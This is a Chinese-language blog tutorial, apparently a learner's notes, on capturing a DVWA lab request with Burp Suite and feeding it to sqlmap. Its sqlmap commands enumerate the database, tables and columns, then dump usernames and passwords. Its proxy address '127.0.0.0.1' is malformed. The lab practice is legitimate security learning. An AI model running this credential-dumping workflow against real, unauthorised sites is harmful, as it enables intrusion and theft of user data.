使用burpsuite抓包 + sql工具注入 dvwa靶場
記錄一下自己重新開始學習web安全之路②。
一、準備工作
1.工具準備 sqlmap + burpsuite
2.瀏覽器準備 火狐瀏覽器 + 設置代理。
首先,先設置一下火狐瀏覽器的代理
http代理地址為127.0.0.0.1 ,端口為8080
3.burpsuite 準備 將burpsuite的抓包功能打開。
注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地網卡 ip/dvwa-master 訪問
怎么查到本地網卡ip?
在cmd中輸入ipconfig
得到本地網卡ip 192.168.92.1
如果是無線網,那么找無線網適配器的IPV4地址
通過本地網卡ip進入dvwa,把安全等級改為low等級,,設置代理之后。
在搜索框輸入之后,點擊submit。
通過burpsuite抓包得到
注:抓到的包必須是注入點的包。
如:
(GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等
然后在burpsuite中 點擊Action — Save item 保存到本地。
保存之后,利用sqlmap工具。首先要在cmd中先來到sqlmap的文件路徑下。
目標:拿賬號密碼(數(shù)據(jù))
1.查詢數(shù)據(jù)庫的名稱 (dvwa)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db
-r // 指定讀取本地文件
–current-db //列出當前網站數(shù)據(jù)庫名稱
2.查詢數(shù)據(jù)表的名稱 (guestbook 、users)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables
-D //指定數(shù)據(jù)庫名稱
–tables //數(shù)據(jù)表
3.查詢數(shù)據(jù)列的名稱 (user 、password)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns
-T //指定數(shù)據(jù)表的名稱
–columns //列出數(shù)據(jù)列的名稱
4.讀取數(shù)據(jù) (user、password)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump
-C //指定數(shù)據(jù)列的名稱
–dump // 讀取數(shù)據(jù)
拿賬號密碼時遇到的問題:
1.首先是burpsuite抓包時 火狐瀏覽器顯示
文章來源:http://www.zghlxwxcb.cn/news/detail-729973.html
通過百度得到解決辦法:
文章來源地址http://www.zghlxwxcb.cn/news/detail-729973.html
2.sqlmap,更新問題,可以不用管,但是一開始看到有警告,去官網下了一個新的sqlmap即可。
到了這里,關于使用burpsuite抓包 + sql工具注入 dvwa初級靶場的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!